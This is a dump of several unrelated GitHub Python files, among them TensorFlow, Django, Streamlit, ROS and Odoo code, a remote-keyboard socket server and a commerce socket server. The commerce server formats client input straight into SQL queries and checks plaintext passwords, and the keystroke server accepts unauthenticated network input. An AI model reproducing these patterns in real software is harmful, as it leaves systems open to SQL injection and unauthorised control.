weight_variable(shape=shape)\n print('weights: ', weights.get_shape())\n biases = bias_variable(length=num_filters)\n layer = tf.nn.conv1d(value=input,\n filters=weights,\n stride=2,\n padding='SAME')\n layer += biases\n print('layer: ', layer.get_shape())\n if use_pooling:\n layer = tf.nn.pool(input=layer,\n window_shape=[1],\n pooling_type=\"MAX\",\n strides=[1],\n padding='SAME')\n layer = tf.nn.sigmoid(layer)\n return layer, weights\n\ndef flatten_layer(layer):\n layer_shape = layer.get_shape()\n num_features = layer_shape[1:3].num_elements()\n layer_flat = tf.reshape(layer, [-1, num_features])\n return layer_flat, num_features\n\ndef new_fc_layer(input, # The previous layer.\n num_inputs, # Num. inputs from prev. layer.\n num_outputs, # Num. 
outputs.\n use_sigmoid=True): # Use sigmoid\n\n weights = weight_variable(shape=[num_inputs, num_outputs])\n biases = bias_variable(length=num_outputs)\n layer = tf.matmul(input, weights) + biases\n if use_sigmoid:\n layer = tf.nn.sigmoid(layer)\n return layer\n\t\nx = tf.placeholder(tf.float32, shape=[None, num_anc], name='x')\nprint('x: ', x._shape)\nx_input = tf.reshape(x, [-1, num_anc, num_channels])\nprint('x_input: ', x_input._shape)\ny_true = tf.placeholder(tf.float32, shape=[None, 1], name='y_true')\ny_true_cls = tf.argmax(y_true, dimension=1)\n\nlayer_conv1, weights_conv1 = new_conv_layer(input=x_input,\n num_input_channels=num_channels,\n filter_size=filter_size1,\n num_filters=num_filters1,\n use_pooling=True)\n\nlayer_conv2, weights_conv2 = new_conv_layer(input=layer_conv1,\n num_input_channels=num_filters1,\n filter_size=filter_size2,\n num_filters=num_filters2,\n use_pooling=True)\n\t\t\t\t \nlayer_flat, num_features = flatten_layer(layer_conv2)\nprint('num_features ', num_features)\n\nlayer_fc1 = new_fc_layer(input=layer_flat,\n num_inputs=num_features,\n num_outputs=fc_size,\n use_sigmoid=True)\n\t\t\t\t\nlayer_fc2 = new_fc_layer(input=layer_fc1,\n num_inputs=fc_size,\n num_outputs=num_classes,\n use_sigmoid=False)\n\t\t \ny_pred = tf.nn.softmax(layer_fc2)\ny_pred_cls = tf.argmax(y_pred, dimension=1)\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=layer_fc2, labels=y_true)\ncost = tf.reduce_mean(cross_entropy)\noptimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(cost)\ncorrect_prediction = tf.equal(y_pred_cls, y_true_cls)\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nloss = tf.reduce_mean(tf.square(y_pred_cls - y_true_cls))\n\nsession = tf.Session()\nsession.run(tf.initialize_all_variables())\n\ntotal_iterations = 0\t\n\ndef optimize(num_iterations):\n global total_iterations\n start_time = time.time()\n #------ test samples -----------\n test_a, test_l = data.test_samples()\n feed_dict_test = {x: test_a, y_true: test_l}\n #------ train samples -----------\n x_batch, y_true_batch = data.train_samples()\n feed_dict_train = {x: x_batch, y_true: y_true_batch}\n\n saver = tf.train.Saver()\n \n for i in range(total_iterations, total_iterations + num_iterations):\n session.run(optimizer, feed_dict=feed_dict_train)\n err = session.run(loss, feed_dict=feed_dict_train)\n acc = session.run(accuracy, feed_dict=feed_dict_test)\n\n if acc == 1.0:\n saver.save(session, 'model_d_' + str(distance) + '.ckpt')\n break\n\n\n if i % 10 == 0:\n msg = \"Optimization Iteration: {0:>6}, Training Error: {1:>6.2%}, Training Accuracy: {2:>6.2%}\"\n print(msg.format(i + 1, err, acc))\n\n total_iterations += num_iterations\n end_time = time.time()\n time_dif = end_time - start_time\n print(\"Time usage: \" + str(timedelta(seconds=int(round(time_dif)))))\n\ntest_batch_size = 200\n'''\ndef print_test_accuracy():\n test_a, test_l = ld.test_samples()\n num_test = len(test_a)\n cls_pred = np.zeros(shape=num_test, dtype=np.int)\n i = 0\n\n while i < num_test:\n j = min(i + test_batch_size, num_test)\n a, l = ld.next_batch()\n inputs = test_a[i:j]\n targets = test_l[i:j]\n feed_dict = {x: inputs, y_true: targets}\n cls_pred[i:j] = session.run(y_pred_cls, feed_dict=feed_dict)\n i = j\n cls_true = test_l\n correct = (cls_true == cls_pred)\n correct_sum = correct.sum()\n acc = float(correct_sum) / num_test\n msg = \"Accuracy on Test-Set: {0:.1%} ({1} / {2})\"\n print(msg.format(acc, correct_sum, num_test))\n'''\ndata = load_data('d=7_uniform_distr_samples.txt', 
20000)\noptimize(num_iterations=1000)\n#print_test_accuracy()","repo_name":"bcriger/sc_decoding","sub_path":"NN_convolutional/training_conv.py","file_name":"training_conv.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5948050389","text":"#echo-server-thread.py\nimport pyautogui\nimport socket\nfrom _thread import *\n\nHOST_IP='192.168.0.26'\nHOST_PORT=10000\n\ndef my_com_th(client_socket, addr):\n #print('Client address: ',addr)\n while True:\n try:\n data = client_socket.recv(1024)\n if not data:\n #print('Client',addr, 'disconnected')\n break\n \n if data.decode() =='a':\n pyautogui.keyDown('a')\n pyautogui.keyUp('a')\n elif data.decode() =='s':\n pyautogui.keyDown('s')\n pyautogui.keyUp('s')\n elif data.decode() =='d':\n pyautogui.keyDown('d')\n pyautogui.keyUp('d')\n elif data.decode() =='f':\n pyautogui.keyDown('f')\n pyautogui.keyUp('f')\n\n elif data.decode() =='e':\n print('\\nend') \n \n #print('received from client is:', addr[0], data.decode())\n except ConnectionResetError as e:\n print('Client',addr[0], 'disconnected')\n break\n client_socket.close()\nserver_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nserver_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver_socket.bind((HOST_IP,HOST_PORT))\nserver_socket.listen()\nprint(\"서버가 시작되었습니다.\")\nwhile True:\n client_socket, addr = server_socket.accept()\n start_new_thread(my_com_th, (client_socket, addr))\n \nserver_socket.close()\n","repo_name":"jeonghwan0458/WIFI-keyboard","sub_path":"Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74593039411","text":"from typing import Any, Dict, List\nimport json\nimport numpy as np\nfrom PIL import Image\n\n\ndef get_batch_size(config: Dict[str, Any], data_size: int) -> int:\n strategy = config[\"training_strategy\"]\n\n if strategy == \"batch\":\n return data_size\n elif strategy == \"mini_batch\":\n batch_size = config[\"batch_size\"]\n\n if batch_size > data_size:\n raise ValueError(\"Batch size must be smaller than the dataset size\")\n\n return batch_size\n elif strategy == \"online\":\n return 1\n else:\n raise ValueError(\"Invalid training strategy\")\n\n\ndef pretty_print_font(bitmap):\n delta = 0.1\n for row in bitmap:\n for pixel in row:\n if pixel < delta:\n print(\" \", end=\"\")\n else:\n print(\"█\", end=\"\")\n print()\n\n\ndef create_image(fonts, path, size=(7, 5)):\n # Add a border around each font, 1 pixel wide\n fonts = np.pad(fonts, ((0, 0), (1, 1), (1, 1)), \"constant\", constant_values=0)\n\n # Scale the fonts up\n fonts = fonts.repeat(10, axis=1).repeat(10, axis=2)\n\n bitmap_height, bitmap_width = len(fonts[0]), len(fonts[0][0])\n cols, rows = size\n composite_width = cols * bitmap_width\n composite_height = rows * bitmap_height\n\n composite_image = Image.new(\"L\", (composite_width, composite_height))\n\n for i, font in enumerate(fonts):\n font_image = Image.fromarray(font * 255)\n x = i % cols\n y = i // cols\n composite_image.paste(font_image, (x * bitmap_width, y * bitmap_height))\n\n # Add a border around each image\n\n composite_image.save(path)\n composite_image.show()\n\n\ndef serialize_weights(weights, path=\"weights.json\"):\n # Convert the weights to a list of lists\n weights = [[w.tolist() for w in layer] for layer in weights]\n\n with open(path, \"w\") as f:\n 
json.dump(weights, f)\n\n\ndef deserialize_weights(path=\"weights.json\") -> List[np.ndarray]:\n with open(path, \"r\") as f:\n weights = json.load(f)\n\n # Convert the weights to numpy arrays\n weights = [[np.array(w) for w in layer] for layer in weights]\n weights = [np.array(layer) for layer in weights]\n\n return weights\n\n\nstop_flag = False\ndef signal_handler(sig, frame):\n global stop_flag\n stop_flag = True\n print(\"Stopping...\")\n\ndef stop():\n global stop_flag\n return stop_flag\n\n","repo_name":"ImNotGone/sia-tp5","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20198529820","text":"from django.shortcuts import render, get_object_or_404\n\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom .models import Game, PlayerGame\nfrom .forms import GameForm, GamePlayersForm\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom django.urls import reverse\n\n\"\"\"\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\"\"\"\n\n\n@login_required\ndef index(request):\n games = Game.objects.all().order_by('-time_start')\n gamePlayers = PlayerGame.objects.all() #výpis hráčů na indexu\n is_admin_or_player = is_player_or_admin(request.user)\n context = {'games': games, 'gameplayers': gamePlayers, 'is_admin_or_player': is_admin_or_player}\n return render(request, 'index.html', context)\n\n\n@login_required\ndef detail(request, id):\n game = Game.objects.get(pk=id)\n players = PlayerGame.objects.filter(game=id) #detail hry\n is_admin_or_player = is_player_or_admin(request.user)\n\n if request.method == 'POST' and game.active:\n game.time_end = timezone.now()\n game.active = False\n\n winner = game.get_winner()\n winner_name = winner.username if winner else None #získávání výherce hry\n game.winner = winner_name\n game.save()\n\n return render(request, 'gameDetail.html',\n {'game': game, 'players': players, 'is_admin_or_player': is_admin_or_player,\n 'winner': str(game.winner)})\n\n\n@login_required\ndef delete(request, id):\n game = Game.objects.get(pk=id)\n game.delete() #mazání her\n return HttpResponseRedirect('/')\n\n\ndef deletePlayer(request, id):\n gamePlayer = PlayerGame.objects.get(pk=id)\n game_id = gamePlayer.game.id #mazání hráčů ve hře\n is_current_winner = False\n\n game = Game.objects.get(id=game_id)\n if game.winner == gamePlayer.player.username:\n is_current_winner = True\n\n gamePlayer.delete()\n\n if is_current_winner:\n winner = game.get_winner()\n if winner:\n game.winner = winner.playergame_set.first().player.username #pokud je mazaný hráč výherce musí se přepnout vítěz\n else:\n game.winner = None\n game.save()\n\n return HttpResponseRedirect(reverse('detail', args=[game_id]))\n\n\n\ndef gameEdit(request, id):\n game = get_object_or_404(Game, id=id)\n\n if request.method == 'GET':\n form = GameForm(instance=game)\n context = {'form': form, 'id': id, 'game': game}\n return render(request, 'gameEdit.html', context)\n\n elif request.method == 'POST':\n form = GameForm(request.POST, instance=game)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/')\n else:\n context = {'form': form, 'id': id, 'game': game}\n return render(request, 'gameEdit.html', context)\n\n\ndef is_player_or_admin(user):\n if user.is_superuser: #funkce na určení zda je užívatel admin nebo hráč\n return 
user.is_superuser\n else:\n return user.groups.filter(name='Hráč').exists()\n\n\n@login_required\n@user_passes_test(is_player_or_admin, login_url='/')\ndef add(request): #přidávání her\n active_games = Game.objects.filter(active=True).count()\n\n if active_games >= 2 and request.POST.get('active'):\n error_message = \"Nelze mít více než 2 aktivní hry. Vydrž než hry skončí :)\" #počet aktivních her nesmí být větší než 2\n return render(request, 'gameAdd.html', {'form': GameForm(), 'error_message': error_message})\n\n if request.method == 'POST':\n form = GameForm(request.POST)\n if form.is_valid():\n title = form.cleaned_data['title']\n time_start = timezone.now() if form.cleaned_data['active'] else form.cleaned_data['time_start'] #pokud je hra aktivní nastaví se aktuální čas\n time_end = form.cleaned_data['time_end']\n description = form.cleaned_data['description']\n author = request.user\n active = form.cleaned_data['active']\n game = Game.objects.create(title=title, time_start=time_start, time_end=time_end, description=description,\n author=author, active=active)\n return HttpResponseRedirect(reverse('detail', args=[game.id]))\n else:\n form = GameForm()\n\n return render(request, 'gameAdd.html', {'form': form})\n\n\n@login_required\n@user_passes_test(is_player_or_admin, login_url='/')\ndef addGamePlayers(request): #přidávání hráčů do hry\n if request.method == 'POST':\n form = GamePlayersForm(request.POST)\n if form.is_valid():\n game = form.cleaned_data['game']\n player = form.cleaned_data['player']\n score = form.cleaned_data['score']\n get_player = User.objects.get(username=player[0])\n get_game = Game.objects.get(title=game[0])\n\n if PlayerGame.objects.filter(game=get_game, player=get_player).exists(): #pokud hráč se ve hře nachází, už nelze přidat\n error_message = f\"Hráč {get_player.username} už byl přidán do hry.\"\n form.add_error('player', error_message)\n return render(request, 'gamePlayersAdd.html', {'form': form})\n\n PlayerGame.objects.create(game=get_game, player=get_player, score=score)\n\n if not get_game.active:\n winner = get_game.get_winner()\n get_game.winner = winner.playergame_set.first().player.username #nastavování výherce pokud hra neni aktivní\n get_game.save()\n\n return HttpResponseRedirect(reverse('detail', args=[get_game.pk]))\n else:\n form = GamePlayersForm()\n\n return render(request, 'gamePlayersAdd.html', {'form': form})\n\n\n@login_required\n@user_passes_test(is_player_or_admin, login_url='/')\ndef userGames(request):\n userGames = PlayerGame.objects.filter(player=request.user).order_by('-game__time_start') #historie hráče\n return render(request, 'user_games.html', {'userGames': userGames})\n","repo_name":"radunan/Projekt_django","sub_path":"games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24159379976","text":"import streamlit as st\nimport pre\n\nfrom io import StringIO\nimport helper\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nst.sidebar.title(\"whatsapp chat analyzer\")\ndocx_file = st.sidebar.file_uploader(\"Upload Document\") \na=False\nif docx_file is not None:\n bytes_data=docx_file.getvalue()\n file_like_object = StringIO(bytes_data.decode(\"utf-8\"))\n data,scr = pre.preprocess(file_like_object)\n st.dataframe(data) #displaying the chat data in different columns in streamlit\n\t \n # getting unique users\n user_list = data['Contact'].unique().tolist()\n \n imagename=scr+\".jpg\"\n\n 
image = Image.open(imagename)\n\n user_list.sort()\n user_list.insert(0,\"Overall\")\n selected_user = st.sidebar.selectbox(\"Show analysis wrt\",user_list)\n \n\n if st.sidebar.button(\"Show Analysis\"):\n st.subheader(\"Overall Sentiment is\")\n st.subheader(scr)\n image=image.resize((110,90))\n st.image(image)\n a=True\n # Stats Area\n num_messages, words, num_media_messages, num_links = helper.fetch_stats(selected_user,data)\n st.title(\"Top Statistics\")\n col1, col2, col3, col4 = st.columns(4)\n\n with col1:\n st.header(\"Total Messages\")\n st.title(num_messages)\n with col2:\n st.header(\"Total Words\")\n st.title(words)\n with col3:\n st.header(\"Media Shared\")\n st.title(num_media_messages)\n with col4:\n st.header(\"Links Shared\")\n st.title(num_links)\nif a:\n if selected_user == 'Overall':\n # its generate most buy users in graphically\n\n st.title('Most Busy Users')\n x,new_df = helper.most_busy_users(data)\n fig, ax = plt.subplots()\n\n col1, col2 = st.columns(2)\n col3,col4,col5= st.columns(3)\n\n with col1:\n ax.bar(x.index, x.values,color='red')\n plt.xticks(rotation='vertical')\n st.pyplot(fig)\n with col2:\n st.dataframe(new_df)\n with col3:\n st.markdown(\"
Most Positive Contribution\",unsafe_allow_html=True)\n x = helper.percentage(data,1)\n st.dataframe(x)\n with col4:\n st.markdown(\"Most Neutral Contribution\",unsafe_allow_html=True)\n y = helper.percentage(data, 0)\n st.dataframe(y)\n with col5:\n st.markdown(\"Most Negative Contribution
    \",unsafe_allow_html=True)\n z = helper.percentage(data, -1) \n st.dataframe(z)\n # its generate word cloud\n\n st.title(\"Wordcloud\")\n df_wc = helper.create_wordcloud(selected_user,data)\n fig,ax = plt.subplots()\n ax.imshow(df_wc)\n st.pyplot(fig)\n most_common_df = helper.most_common_words(selected_user,data)\n\n fig,ax = plt.subplots()\n\n ax.barh(most_common_df[0],most_common_df[1])\n plt.xticks(rotation='vertical')\n\n # its generate collection of most common words used in the chat\n\n st.title('Most commmon words')\n st.pyplot(fig)\n emoji_df = helper.emoji_helper(selected_user,data)\n st.title(\"Emoji Analysis\")\n\n col1,col2 = st.columns(2)\n\n with col1:\n st.dataframe(emoji_df)\n with col2:\n fig,ax = plt.subplots()\n ax.pie(emoji_df[1].head(),labels=emoji_df[1].head(),autopct=\"%0.2f\")\n st.pyplot(fig)\n\n #generate dailt timeline graph\n\n st.title(\"Daily Timeline\")\n daily_timeline = helper.daily_timeline(selected_user, data)\n fig, ax = plt.subplots()\n ax.plot(daily_timeline['only_date'], daily_timeline['Message'], color='black')\n plt.xticks(rotation='vertical')\n st.pyplot(fig)\n st.title('Activity Map')\n col1,col2 = st.columns(2)\n\n with col1:\n # its generate most busy day in graphically\n\n st.header(\"Most busy day\")\n busy_day = helper.week_activity_map(selected_user,data)\n fig,ax = plt.subplots()\n ax.bar(busy_day.index,busy_day.values,color='green')\n plt.xticks(rotation='vertical')\n st.pyplot(fig)\n with col2:\n # its generate most busy month in graphically\n\n st.header(\"Most busy month\")\n busy_month = helper.month_activity_map(selected_user, data)\n fig, ax = plt.subplots()\n \n ax.bar(busy_month.index, busy_month.values,color='blue')\n plt.xticks(rotation='vertical')\n st.pyplot(fig)","repo_name":"vineethkumar12/whatsapp-chat-analayzer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"985656741","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 22 10:38:09 2021\n\n@author: Anjolaoluwa\nServer script to handle user authentication requests\n\"\"\"\nimport shelve\nimport threading\n\nimport mysql.connector\nimport socket\nimport json # used to move data in complex forms such as lists and dictionaries\nimport random\nfrom datetime import date, datetime\n\n\nclass processServer(threading.Thread):\n def __init__(self, client, addr):\n threading.Thread.__init__(self)\n self.client = client\n self.addr = addr\n self.conn = mysql.connector.connect(host=\"localhost\", database=\"commercedb\", user=\"root\", password=\"\")\n self.cursor = self.conn.cursor()\n\n def run(self):\n myclient = threading.local()\n myclient.client = self.client\n myclient.addr = self.addr\n print(\"Accepted connection from \", myclient.addr)\n myclient.client.send(str.encode(\"Welcome to my server!\"))\n\n while True:\n data = client.recv(1024)\n message = json.loads(bytes.decode(data))\n\n if \"register\" in message:\n message.remove(\"register\")\n self.cursor.execute(\n \"INSERT INTO commerce_users (user_id,username,email,password,reg_status) VALUES('{}','{}','{}','{}','{}')\".format(\n *message))\n # * is for list, ** is for dictionary, acts like a spread operator\n self.cursor.execute(\"SELECT * from commerce_users ORDER BY id DESC LIMIT 1\")\n # ORDER BY means sort by. 
DESC means sort serially in descending order and LIMIT the search to just\n # one row\n resp = self.cursor.fetchall() # resp stands for response\n\n print(\"Sending registration response...\")\n self.client.send(str.encode(json.dumps(resp)))\n # encodes the complex data type (list,dict,tuple) first in\n # form of json then in form of string\n # json.loads() is for decoding json, json.dumps() is for encoding json\n # bytes.decode() is for decoding string, str.encode() is for encoding string\n self.conn.commit()\n # client.close()\n\n elif \"login\" in message:\n message.remove(\"login\")\n self.cursor.execute(\n \"SELECT * FROM commerce_users WHERE username='{}' AND password='{}'\".format(*message))\n resp = self.cursor.fetchall()\n print(\"Sending login response...\")\n self.client.send(str.encode(json.dumps(resp)))\n self.conn.commit()\n # client.close()\n # conn.close()\n\n elif \"calculate\" in message:\n dicts = {\n 'bag': 0,\n 'heels': 0,\n 'blouse': 0,\n 'shirt': 0,\n 'trousers': 0,\n 'jeans': 0,\n 'sneakers': 0,\n 'skirt': 0,\n 'socks': 0\n }\n self.cursor.execute(\"SELECT * FROM price\")\n rows = self.cursor.fetchall()\n print(rows)\n for row in rows:\n dicts[row[1]] = float(row[2]) # the price is in row[2] while meal is in row[1]\n # eg dict['jeans']=2000.00\n\n self.client.send(str.encode(json.dumps(dicts)))\n self.conn.commit()\n # client.close()\n\n\n elif \"transaction\" in message:\n del message['transaction']\n trans = shelve.open(\"trans_info\", flag=\"n\")\n username = message['username']\n self.cursor.execute(\"SELECT user_id FROM commerce_users WHERE username='{}'\".format(username))\n user_id = self.cursor.fetchone()\n # we use fetchone() because we only need one row since user_id is unique to each user\n message['user_id'] = user_id[0]\n\n for item in message:\n trans[item] = message[item]\n trans.close()\n print(\"Sending transaction response...\")\n self.client.send(str.encode(json.dumps(message)))\n self.conn.commit()\n\n\n elif \"post\" in message:\n newdicts = {}\n trans = shelve.open(\"trans_info\")\n for item in trans:\n newdicts[item] = trans[item]\n trans.close()\n user_id = newdicts['user_id']\n username = newdicts['username']\n transaction_date = datetime.now()\n trans_date = transaction_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n del newdicts['user_id']\n del newdicts['username']\n\n print(newdicts)\n\n for row in newdicts:\n self.cursor.execute(\n \"INSERT INTO transaction (emp_id, employee, item, amount, date_purchase) VALUES ('{}', '{}', '{}', '{}', '{}')\".format(\n user_id, username, row, newdicts[row], trans_date))\n self.cursor.execute(\"SELECT * FROM transaction WHERE date_purchase = '{}'\".format(trans_date))\n result = self.cursor.fetchall()\n print(f\"The result is {result}\")\n if not result:\n msg = \"success\"\n else:\n msg = \"failed\"\n self.client.send(str.encode(msg))\n self.conn.commit()\n\n\n\n\n\n elif \"logout\" in message:\n break\n\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = \"\"\nport = 8000\nserver.bind((host, port))\nserver.listen(5)\n\nwhile True:\n print(\"Listening for a client...\")\n client, addr = server.accept()\n client1 = processServer(client, addr)\n client1.start()\n","repo_name":"anjielayo/AZBanking","sub_path":"other files/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32051847961","text":"#!/usr/bin/env python\n\nfrom jsk_arc2017_common.msg import 
WorkOrder\nfrom jsk_arc2017_common.msg import WorkOrderArray\nimport json\nimport os.path as osp\nimport rospy\n\n\nclass WorkOrderServer(object):\n\n abandon_items = [\n 'measuring_spoons',\n 'mesh_cup'\n ]\n\n def __init__(self):\n json_dir = rospy.get_param('~json_dir', None)\n self.rate = rospy.get_param('~rate', 1.0)\n if json_dir is None:\n rospy.logerr('must set json dir path to ~json_dir')\n return\n location_path = osp.join(json_dir, 'item_location_file.json')\n with open(location_path) as location_f:\n bins = json.load(location_f)['bins']\n order_path = osp.join(json_dir, 'order_file.json')\n with open(order_path) as order_f:\n orders = json.load(order_f)['orders']\n\n self.item_location = {}\n for bin_ in bins:\n bin_id = bin_['bin_id']\n for item_name in bin_['contents']:\n self.item_location[item_name] = bin_id\n\n self.cardboard_ids = {}\n for order in orders:\n size_id = order['size_id']\n num_contents = len(order['contents'])\n if num_contents == 2:\n self.cardboard_ids[size_id] = 'A'\n elif num_contents == 3:\n self.cardboard_ids[size_id] = 'B'\n else:\n self.cardboard_ids[size_id] = 'C'\n\n larm_orders = orders[:2]\n rarm_orders = orders[2:3]\n self.larm_msg = self._generate_msg(larm_orders)\n self.rarm_msg = self._generate_msg(rarm_orders)\n self.larm_pub = rospy.Publisher(\n '~left_hand', WorkOrderArray, queue_size=1)\n self.rarm_pub = rospy.Publisher(\n '~right_hand', WorkOrderArray, queue_size=1)\n rospy.Timer(rospy.Duration(1.0 / self.rate), self._publish_msg)\n\n def _generate_msg(self, orders):\n order_msgs = []\n for order in orders:\n size_id = order['size_id']\n for target_item in order['contents']:\n if target_item in self.abandon_items:\n continue\n order_msg = WorkOrder()\n order_msg.bin = self.item_location[target_item]\n order_msg.item = target_item\n order_msg.box = self.cardboard_ids[size_id]\n order_msgs.append(order_msg)\n order_array_msg = WorkOrderArray()\n order_array_msg.orders = order_msgs\n return order_array_msg\n\n def _publish_msg(self, event):\n self.larm_pub.publish(self.larm_msg)\n self.rarm_pub.publish(self.rarm_msg)\n\nif __name__ == '__main__':\n rospy.init_node('work_order_server')\n work_order_server = WorkOrderServer()\n rospy.spin()\n","repo_name":"mmurooka/jsk_apc","sub_path":"jsk_arc2017_common/node_scripts/work_order_publisher.py","file_name":"work_order_publisher.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"45575602375","text":"#!/usr/bin/env python3\n\n\"\"\"\nFaça um algoritmo que \nlê o nome de um vendedor, \nlê o salário fixo do vendedor,\nlê o total (em reais) de vendas por ele efetuadas e \nlê o percentual que ganha sobre o total de vendas. \nO algoritmo deve calcular o salário total do vendedor e exibir, \n+ ao final, a seguinte frase:\n\nO vendedor recebeu reais.\n\"\"\"\n\nname = str(input(\"Ola vendedor! 
digite seu nome: \", ))\nsalario_fixo = float(input(\"Digite seu salario fixo: \", ))\nsalario_vendas = float(input(\"Digite o valor do total de vendas: \", ))\nsalario_percentual = float(input(\"Digite o percentual de ganho das vendas: \", ))\n\nsalario_total = salario_fixo+salario_vendas+salario_percentual \n\nprint(\"\\nO vendedor\", name, \"recebeu\", salario_total ,\"reais.\")","repo_name":"DIEGOHORVATTI/IFC","sub_path":"caderno/1_semestre/algoritimos/aula_4/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7808774581","text":"import logging\nfrom datetime import timedelta\nfrom functools import partial\n\nimport psycopg2\nimport pytz\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.tools import float_is_zero, float_round\nfrom odoo.exceptions import ValidationError, UserError\nfrom odoo.http import request\nfrom odoo.osv.expression import AND\nimport base64\n\n_logger = logging.getLogger(__name__)\n\n\nclass PosConfig(models.Model):\n\t_inherit = 'pos.config'\n\n\tpos_verify_delivery = fields.Boolean(string='Home Delivery')\n\tpos_users = fields.Many2many(\n\t comodel_name='res.users', relation='pos_config_users_rel')\n\n\nclass ResConfigSettings(models.TransientModel):\n\t_inherit = 'res.config.settings'\n\n\tpos_res_verify_delivery = fields.Boolean(related='pos_config_id.pos_verify_delivery', readonly=False)\n\t\n\nclass ProductDeliveryCharge(models.Model):\n\t_inherit = 'product.product'\n\t\n\tis_home_delivery_charge = fields.Boolean('Delivery Charge')\n\n\nclass AccountJournal(models.Model):\n\t_inherit = 'account.journal'\n\n\tis_home_delivery = fields.Boolean('Use as Home Delivery', help='if you use this journal as home delivery, it will not create any payment entries for that order')\n\n\nclass account_journal(models.Model):\n\t_inherit = 'pos.payment.method'\n\n\tis_home_delivery = fields.Boolean(string='Use as Home Delivery',related='journal_id.is_home_delivery',readonly=False)\n\n\t@api.constrains('is_home_delivery')\n\tdef _check_home_delivery_method(self):\n\t\thome_payment_method = self.env['pos.payment.method'].search_count([('is_home_delivery', '=', True)])\n\t\tif home_payment_method > 1:\n\t\t\traise UserError(_(\"Already one payment selected as home delivery , you can not create multiple home delivery methods.\"))\n\nclass PosOrder(models.Model):\n\t_inherit = 'pos.order'\n\n\tdelivery_order = fields.Boolean(string='Is Home Delivery Order')\n\n\tdef write(self, vals):\n\t\tfor order in self :\n\t\t\tif order.name == '/' and order.delivery_order :\n\t\t\t\tvals['name'] = order.config_id.sequence_id._next()\n\t\treturn super(PosOrder, self).write(vals)\n\n\t@api.model\n\tdef _order_fields(self, ui_order):\n\t\tres = super(PosOrder, self)._order_fields(ui_order)\n\t\tres['delivery_order'] = ui_order.get('delivery') or False\n\t\treturn res\n\t\n\t@api.model\n\tdef create_from_ui(self, orders, draft=False):\n\t\tpos_order_ids = super(PosOrder, self).create_from_ui(orders, draft)\n\t\tfor order in pos_order_ids:\n\t\t\torder_rec = self.browse(order.get('id'))\n\t\t\tref_order = [o['data'] for o in orders if o['data'].get('name') == order_rec.pos_reference]\n\t\t\tdelivery_ids = self.env['pos.delivery.order'].sudo().search([('order_no', '=', order_rec.pos_reference)])\n\t\t\tif delivery_ids:\n\t\t\t\tdelivery_ids.write({'pos_order_id': order.get('id')})\n\t\t\t\torder_rec.write({'state': 'done'})\n\t\treturn pos_order_ids\n\n\tdef 
_process_payment_lines(self, pos_order, order, pos_session, draft):\n\t\t\"\"\"Create account.bank.statement.lines from the dictionary given to the parent function.\n\n\t\tIf the payment_line is an updated version of an existing one, the existing payment_line will first be\n\t\tremoved before making a new one.\n\t\t:param pos_order: dictionary representing the order.\n\t\t:type pos_order: dict.\n\t\t:param order: Order object the payment lines should belong to.\n\t\t:type order: pos.order\n\t\t:param pos_session: PoS session the order was created in.\n\t\t:type pos_session: pos.session\n\t\t:param draft: Indicate that the pos_order is not validated yet.\n\t\t:type draft: bool.\n\t\t\"\"\"\n\t\tprec_acc = order.pricelist_id.currency_id.decimal_places\n\n\t\torder_bank_statement_lines= self.env['pos.payment'].search([('pos_order_id', '=', order.id)])\n\t\torder_bank_statement_lines.unlink()\n\t\tif not order.delivery_order :\n\t\t\tfor payments in pos_order['statement_ids']:\n\t\t\t\tif not float_is_zero(payments[2]['amount'], precision_digits=prec_acc):\n\t\t\t\t\torder.add_payment(self._payment_fields(order, payments[2]))\n\n\t\torder.amount_paid = sum(order.payment_ids.mapped('amount'))\n\t\tif not draft and not float_is_zero(pos_order['amount_return'], prec_acc):\n\t\t\tcash_payment_method = pos_session.payment_method_ids.filtered('is_cash_count')[:1]\n\t\t\tif not cash_payment_method:\n\t\t\t\traise UserError(_(\"No cash statement found for this session. Unable to record returned cash.\"))\n\t\t\treturn_payment_vals = {\n\t\t\t\t'name': _('return'),\n\t\t\t\t'pos_order_id': order.id,\n\t\t\t\t'amount': -pos_order['amount_return'],\n\t\t\t\t'payment_date': fields.Datetime.now(),\n\t\t\t\t'payment_method_id': cash_payment_method.id,\n\t\t\t\t'is_change': True,\n\t\t\t}\n\t\t\torder.add_payment(return_payment_vals)\n\n\n\t@api.model\n\tdef _process_order(self, order, draft, existing_order):\n\t\t\"\"\"Create or update an pos.order from a given dictionary.\n\n\t\t:param dict order: dictionary representing the order.\n\t\t:param bool 